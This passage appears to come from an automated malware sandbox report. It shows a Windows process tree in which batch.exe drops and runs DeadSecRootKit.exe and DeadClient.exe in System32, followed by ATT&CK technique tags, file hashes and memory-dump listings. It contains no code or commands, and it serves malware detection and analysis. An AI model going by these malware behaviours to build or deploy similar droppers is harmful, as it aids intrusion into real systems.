C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2244

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2320

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2328

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
PID:2444

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2532

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2552

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2572

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2588

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2596

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2916

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:3092

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:3212

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3356

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3428
- C:\Users\Admin\AppData\Local\Temp\batch.exe
  "C:\Users\Admin\AppData\Local\Temp\batch.exe"
  2⤵
  - Checks computer location settings
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3500
- - C:\Windows\System32\DeadSecRootKit.exe
    "C:\Windows\System32\DeadSecRootKit.exe"
    3⤵
    - Executes dropped EXE
    PID:4048
- - C:\Windows\System32\DeadClient.exe
    "C:\Windows\System32\DeadClient.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:3348
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 3348 -s 1132
      4⤵
      Checks processor information in registry
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      PID:3988

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3536

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3732

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3888

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3152

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:4604

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:1744

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:3708

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:1728

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:3844

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:1180

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:516

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:2140

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:4116

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2128

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4888

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4908

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks BIOS information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4184

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:3508
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 444 -p 3348 -ip 3348
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID:2460

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9BD2.tmp.csv

Filesize
36KB

MD5
1b9bc05d062d988d9c05a5c6381b3e4d

SHA1
a4cd43f840ab8ef99c60511fd73255bade4857c8

SHA256
fd11fa92cf83eb9cf1d9fb88b63c9c5c5bc1ea39fb0d8c50da8aeae51cdf31a6

SHA512
4f72f6624419ec6d847396fad3e064e90192fcb9a6509fe6182d7ff637b444a0ae80cd8620a6b5c92d8270d988c90cb472b1c238ecce3154ac989b7ed56ef97d

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9C22.tmp.txt

Filesize
13KB

MD5
db22a5a4d3d0f77479783b7a25e025ce

SHA1
4255a44d3cbdda693e95931494194fa22b87004f

SHA256
2469f149a434c77152322f3c48ef9045bb1b1f54b54bb994ba726d84403e9f4f

SHA512
b1b0c45584db345f19f669a8e7ab1729b928c954d46f9922b8c229d942cd93b8cf6c66a6edbc46802578bf483a94a4b9d43cebe99e630ff14da31e6de4a09137

Download Submit
C:\Windows\System32\DeadClient.exe

Filesize
63KB

MD5
f33086a386dd46cf6148beb6e6a6214b

SHA1
1235a154fdcd0e2724768c822778a9ba044bd47e

SHA256
3adccf5f76f998c0481d3e4d8a6535b6f27aa4fc30d213df66aa6256d891a08b

SHA512
677ac48b6b5cbe3465a6533af00d877f610b91ee2aa2c0e505c9d711b831b57cbbfdd73681b699065d3e5e89907e87ad9b5ce20e58c741a826237e3dcefda251

Download Submit
C:\Windows\System32\DeadSecRootKit.exe

Filesize
151KB

MD5
b8479a23c22cf6fc456e197939284069

SHA1
b2d98cc291f16192a46f363d007e012d45c63300

SHA256
18294ee5a6383a48d1bcf2703f17d815529df3a17580e027c3efea1800900e8f

SHA512
786cd468ce3723516dc869b09e008ec5d35d1f0c1a61e70083a3be15180866be637bd7d8665c2f0218c56875a0ee597c277e088f77dd403bdd2182d06bad3bd4

Download Submit
C:\Windows\Temp\__PSScriptPolicyTest_r2n4bgwq.g54.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/384-90-0x0000023AADDB0000-0x0000023AADDD7000-memory.dmp

Filesize
156KB

Download
memory/384-96-0x0000023AADDB0000-0x0000023AADDD7000-memory.dmp

Filesize
156KB

Download
memory/384-97-0x00007FFD507F0000-0x00007FFD50800000-memory.dmp

Filesize
64KB

Download
memory/408-101-0x000002C5178D0000-0x000002C5178F7000-memory.dmp

Filesize
156KB

Download
memory/588-63-0x0000021CD2490000-0x0000021CD24B7000-memory.dmp

Filesize
156KB

Download
memory/588-64-0x00007FFD507F0000-0x00007FFD50800000-memory.dmp

Filesize
64KB

Download
memory/588-55-0x0000021CD2490000-0x0000021CD24B7000-memory.dmp

Filesize
156KB

Download
memory/588-54-0x0000021CD2460000-0x0000021CD2482000-memory.dmp

Filesize
136KB

Download
memory/588-57-0x0000021CD2490000-0x0000021CD24B7000-memory.dmp

Filesize
156KB

Download
memory/676-68-0x0000025912490000-0x00000259124B7000-memory.dmp

Filesize
156KB

Download
memory/676-74-0x0000025912490000-0x00000259124B7000-memory.dmp

Filesize
156KB

Download
memory/676-75-0x00007FFD507F0000-0x00007FFD50800000-memory.dmp

Filesize
64KB

Download
memory/964-85-0x0000024F68700000-0x0000024F68727000-memory.dmp

Filesize
156KB

Download
memory/964-86-0x00007FFD507F0000-0x00007FFD50800000-memory.dmp

Filesize
64KB

Download
memory/964-79-0x0000024F68700000-0x0000024F68727000-memory.dmp

Filesize
156KB

Download
memory/2868-34-0x00000240D4F10000-0x00000240D4F32000-memory.dmp

Filesize
136KB

Download
memory/2868-41-0x00007FFD8ED40000-0x00007FFD8EDFE000-memory.dmp

Filesize
760KB

Download
memory/2868-39-0x00000240D5080000-0x00000240D50A8000-memory.dmp

Filesize
160KB

Download
memory/2868-40-0x00007FFD90770000-0x00007FFD90965000-memory.dmp

Filesize
2.0MB

Download
memory/3348-28-0x00007FFD72750000-0x00007FFD73211000-memory.dmp

Filesize
10.8MB

Download
memory/3348-796-0x00007FFD72750000-0x00007FFD73211000-memory.dmp

Filesize
10.8MB

Download
memory/3348-26-0x0000019345E60000-0x0000019345E76000-memory.dmp

Filesize
88KB

Download
memory/3500-0-0x0000000000830000-0x0000000000866000-memory.dmp

Filesize
216KB

Download
memory/3500-1-0x00007FFD72753000-0x00007FFD72755000-memory.dmp

Filesize
8KB

Download
memory/3500-2-0x00007FFD72750000-0x00007FFD73211000-memory.dmp

Filesize
10.8MB

Download
memory/3500-27-0x00007FFD72750000-0x00007FFD73211000-memory.dmp

Filesize
10.8MB

Download
memory/4812-45-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/4812-42-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/4812-51-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/4812-43-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/4812-48-0x00007FFD90770000-0x00007FFD90965000-memory.dmp

Filesize
2.0MB

Download
memory/4812-49-0x00007FFD8ED40000-0x00007FFD8EDFE000-memory.dmp

Filesize
760KB

Download
memory/4812-47-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/4812-44-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download